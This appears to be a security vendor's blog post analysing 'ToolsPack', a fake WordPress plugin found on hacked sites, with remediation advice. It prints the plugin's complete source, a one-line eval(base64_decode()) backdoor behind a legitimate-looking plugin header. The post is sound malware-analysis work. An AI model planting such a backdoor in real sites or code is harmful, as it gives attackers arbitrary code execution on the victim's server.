New WordPress ToolsPack Plugin

We deal with many compromised sites daily and lately we are seeing something in common across many of the sites running WordPress.

They have installed a plugin called ToolsPack ( ./wp-content/plugins/ToolsPack/ToolsPack.php), which according to the author will “Supercharge your WordPress site with powerful features previously only available to WordPress.com users. core release. Keep the plugin updated!”

Interesting…

However, when we look at the plugin code, all it does is this:

<?php
/*
Plugin Name: ToolsPack
Description: Supercharge your WordPress site with powerful features previously only available to WordPress.com users. core release. Keep the plugin updated!
Version: 1.2
Author: Mark Stain
Author URI: http://checkWPTools.com/
*/
$_REQUEST[e] ? eVAl( base64_decode( $_REQUEST[e] ) ) : exit;
?>

If you are not familiar with PHP, this is just a backdoor that allows attackers to execute any code on your site. If you see this plugin installed on your system, remove it right away!

How this plugin got in there is a different question. On some of compromised websites we noticed it implemented via wp-admin (so stolen passwords), and on others it is being installed via another backdoor.

Removing this plugin will not likely solve your security issues. You have to do a full review of the website – check all your files, update WordPress, change passwords, etc.

Have you seen this plugin, or something like it? make sure to leave a comment with your experience.


Site is hacked? Not sure? Check here http://sitecheck.sucuri.net

Scan your website for free:
About Daniel Cid

Daniel B. Cid is the CTO&Founder of Sucuri and the founder of the open source OSSEC HIDS. His interests range from intrusion detection, log analysis (log-based intrusion detection), web-based malware research and secure development.

You can find more about Daniel at his site dcid.me or on Twitter: @danielcid